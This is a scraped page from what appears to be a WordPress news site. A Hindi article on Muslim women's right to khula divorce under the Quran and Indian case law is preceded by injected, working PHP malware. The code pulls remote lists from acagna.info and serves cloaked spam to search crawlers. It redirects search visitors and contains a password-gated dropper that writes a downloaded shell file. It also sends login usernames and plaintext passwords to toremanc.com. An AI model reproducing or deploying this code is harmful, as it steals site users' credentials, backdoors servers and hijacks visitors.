if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html > <!--[if IE 8]> <html class="ie8" lang="en"> <![endif]--> <!--[if IE 9]> <html class="ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://muslimera.com/xmlrpc.php" /> <title>क़ुरान देता है मुस्लिम महिलाओं को तलाक़ का अधिकार – डॉ सूफिया अहमद – Muslim Era
Thursday, March 23, 2023
Home मुस्लिम एरा लेख क़ुरान देता है मुस्लिम महिलाओं को तलाक़ का अधिकार – डॉ सूफिया...

क़ुरान देता है मुस्लिम महिलाओं को तलाक़ का अधिकार – डॉ सूफिया अहमद

226
0

मुस्लिम महिलाओं का विवाह विच्छेद (खुला ) का अधिकार

पति पत्नी के बीच अपूरणीय मतभेदों के लिए तलाक एक वैध विकल्प है। कुरान पति और पत्नी दोनों के लिए तलाक की व्यवहारिक प्रक्रिया निर्धारित करता है। इस्लाम के अविर्भाव से पहले की अवधि को आम तौर पर जाहिलिया काल के रूप में जाना जाता है, जो अज्ञानता और बर्बरता का काल है। इस अवधि के दौरान महिलाओं को “बिक्री की वस्तु” के रूप में माना जाता था, जिसके कारण उनके पिता और बाद में उनके पतियों द्वारा उनका शोषण किया जाता था। महिलाओं को पत्नी और मां होने की प्राथमिक भूमिका को स्वीकार करने के लिए मजबूर किया गया था जो एक पितृसत्तात्मक समाज की पहचान भी था। पिता के पास अपनी बेटी को सबसे अधिक बोली लगाने वाले को शादी में बेचने का अधिकार था। बदले में, पति ने किसी भी समय और किसी भी कारण से विवाह को समाप्त करने का अधिकार रखते हुए पत्नी का शोषण किया।

इस्लाम द्वारा पेश किए गए सुधारों में से एक महिला का “बिक्री की वस्तु” से परिवर्तन और पति को अपनी पत्नी को महर देने का निर्देश देना था। कुरान महिला को एक व्यक्ति के रूप में उसी तरह मानता है जैसे वह पुरुष को एक व्यक्ति के रूप में मानता है। “अपनी महिलाओं के साथ अच्छा व्यवहार करें और उनके प्रति दयालु रहें क्योंकि वे आपके साथी और प्रतिबद्ध सहायक हैं”। इस्लाम से पहले पत्नी को तलाक मांगने का व्यावहारिक रूप से कोई अधिकार नहीं था; यह कुरान था जिसने उपचार के रूप में इसे प्रदान किया। पवित्र कुरान ने कई आयतों में बार-बार पति के कर्तव्य पर जोर दिया है और निर्देश दिया है कि अपनी पत्नी को दयालुता से रखना उसका कर्तव्य है।

कुरान पत्नी को अपने पति से अलग होने का पारस्परिक अधिकार देता है यदि वह “अपने पति की ओर से क्रूरता या परित्याग से डरती है” (कुरान 4:128) जिसे खुला कहा जाता है। जब एक महिला को लगता है कि उसका वैवाहिक बंधन अब और नहीं टिक सकता है और वह कठिनाई महसूस कर रही है, तो वह अपने अवांछित पति से छुटकारा पा सकती है। खुला खुल-अल-थुआब से निकला है और पत्नी के कहने पर तलाक का प्रावधान करता है। खुला का अर्थ है अस्वीकार करना या अर्थात एक महिला अपनी शादी को अस्वीकार कर सकती है। कुरान में इसका जिक्र निम्नलिखित शब्दों में किया गया है:
“फिर अगर तुम्हें इस बात का डर है कि वे अल्लाह की सीमा के भीतर नहीं रह सकते, तो उन पर कोई दोष नहीं है कि वह इससे मुक्त होने के लिए क्या छोड़ती है।”(4:229)
कुरान में निम्नलिखित आयत खुला तलाक की धारणा से जुड़े हैं:
“यदि पत्नी को पति की ओर से क्रूरता या परित्याग का डर है, तो उन पर कोई दोष नहीं है यदि वे आपस में एक सौहार्दपूर्ण समझौता करते हैं; और ऐसा समझौता सबसे अच्छा है।”(4:128)
पत्नी का खुला अधिकार पूर्ण है और उसे उपयोग करने से कोई नहीं रोक सकता। एक हदीस में उल्लेख है:
“एक महिला पैगंबर के पास आई और कहा: ‘मैं अपने पति से नफरत करती हूं और उससे अलग होना पसंद करती हूं। पैगंबर ने पूछा: ‘क्या आप उस बाग को लौटा देंगे जो उन्होंने आपको एक महर के रूप में दिया था?’ उसने जवाब दिया: ‘हां, इससे भी ज्यादा।’ पैगंबर ने कहा: ‘आपको इससे अधिक नहीं लौटना चाहिए।”

के सी मोयिन बनाम नफीसा, के वाद में 1972 में केरल उच्च न्यायालय ने मुस्लिम विवाह विच्छेद अधिनियम, 1939 के आलोक में मुस्लिम महिलाओं के न्यायिकेतर तलाक के अधिकार को नकार दिया। यह कहा गया कि इस अधिनियम के प्रावधानों के अतिरिक्त किसी भी परिस्थिति में मुस्लिम विवाह पत्नी के कहने पर भंग नहीं हो सकता है। केरल उच्च न्यायालय ने ही 2020 में उक्त 49 साल पुराने फैसले को खारिज कर दिया I न्यायमूर्ति ए मोहम्मद मुस्ताक और न्यायमूर्ति सीएस डायस की पीठ ने कहा कि मुस्लिम महिलाएं अपने पति को दहेज लौटाकर “खुला” कर सकती हैं। दो न्यायाधीशों की पीठ ने कहा कि “शरीयत अधिनियम की धारा 2 में उल्लिखित अतिरिक्त न्यायिक तलाक के अन्य सभी रूप एक मुस्लिम महिला के लिए उपलब्ध हैं। इसलिए, हम मानते हैं कि केसी मोयिन के मामले में घोषित कानून अच्छा कानून नहीं है।”
सुप्रीम कोर्ट ने जुवेरिया अब्दुल मजीद पाटनी बनाम आतिफ इकबाल मंसूरी, (2014) के वाद में, जिसमें कोर्ट ने खुला तलाक पर विचार करते हुए कहा, “यह पत्नी द्वारा बदले में कुछ देने के लिए या उसके प्रस्ताव के साथ भी हो सकता है I पत्नी महर का अपना दावा छोड़ने का प्रस्ताव कर सकती है। ‘खुला’ तलाक का एक तरीका है जो पत्नी की ओर से आगे बढ़ता है, पति बिना उचित बातचीत किये इसको मना नहीं कर सकता कि पत्नी ने उसे बदले में क्या देने की पेशकश की है। ऐशबाग ईदगाह, लखनऊ के इमाम मौलाना खालिद रशीद फरंगी महली, जो एक इस्लामी मध्यस्तता केंद्र और दारुल कज़ा (शरीयत अदालत) के भी प्रमुख है, ने कहा है , “अधिकतर मुस्लिम विवाह ‘खुला’ के साथ समाप्त होते हैं,” उन्होंने कहा कि दारुल कज़ा, या इस्लामी मध्यस्थता केंद्र के आंकड़े बताते हैं कि तलाक के अधिकांश मामले खुले के माध्यम से दायर किए जाते हैं, और महिलाओं की एक बड़ी संख्या खुला के माध्यम से अपनी शादी समाप्त करने का विकल्प चुन रही है।
पिछली शताब्दी में, मुस्लिम देशों में पारिवारिक कानून में सुधार करके पति के तलाक के अधिकार को सीमित किया गया है और पत्नी को आधार दिया गया जिस पर वह न्यायिक तलाक की मांग कर सकती है”। भारत ने 1939 में मुस्लिम विवाह अधिनियम के पारित होने के साथ ऐसा किया, जो एक मुस्लिम महिला को न्यायालय में एक अनिच्छुक या अनुपलब्ध पति को तलाक देने की अनुमति देता है।
पाकिस्तान और बांग्लादेश ने भी अपने कानूनों में सुधार किया और महिलाओं के तलाक के अधिकार को मान्यता दी। यह भी ध्यान दिया जाता है कि कुरान खुला में पति की सहमति की कोई शर्त नहीं रखता है लेकिन न्यायिक व्याख्या और प्रथाओं ने इसे अनिवार्य बना दिया है। दुर्भाग्य से, भारत में अदालतों ने इस्लाम में खुला के अत्यंत उदार और महिला समर्थक कानून की उपेक्षा की है । न्यायालयउन कारणों से विवाह को भंग कर सकती हैं जिनके कारण इसे मुस्लिम कानून के तहत भंग किया जा सकता था इस तथ्य की परवाह किए बिना कि इन कारणों को कुछ न्यायालयों द्वारा मान्यता दी गई है या नहीं। इस विचार को मुस्लिम विवाह विघटन अधिनियम, 1939 की धारा 2 के खंड (IX) से पूर्ण समर्थन मिलता है, जो न्यायालयों को किसी अन्य आधार पर विवाह को भंग करने की अनुमति देता है जिसे मुस्लिम कानून के तहत विवाह के विघटन के लिए मान्य माना जाता है। कानूनी बाधाओं, कुरान के आदेशों की पितृसत्तात्मक व्याख्या और पुरुष रूढ़िवादिता ने भारत में महिलाओं को न्यायिकेतर तलाक के रूप में खुला के अपने अधिकार का प्रयोग करने के लिए विवश किया है । हाल ही में, एक समाचार में कहा गया है कि लखनऊ की एक 42 वर्षीय मुस्लिम महिला ने अपने पति से मेल के द्वारा खुला की इस्लामी प्रक्रिया का उपयोग करते हुए तलाक की घोषणा करते हुए दावा किया कि उसकी शादी भंग हो गई है। महिला ने दावा किया कि उसका पति शराबी था और उसे प्रताड़ित करता था। जब उसके पति ने 10 दिनों तक कोई जवाब नहीं दिया, तो उसने यह दावा करते हुए सार्वजनिक घोषणा की कि खुला उसका इस्लामी अधिकार है। यह भारत में एक मुस्लिम पत्नी द्वारा खुला के पूर्ण अधिकार के प्रयोग के उदाहरणों में से एक है जहां पति ने अपनी सहमति नहीं दी है।
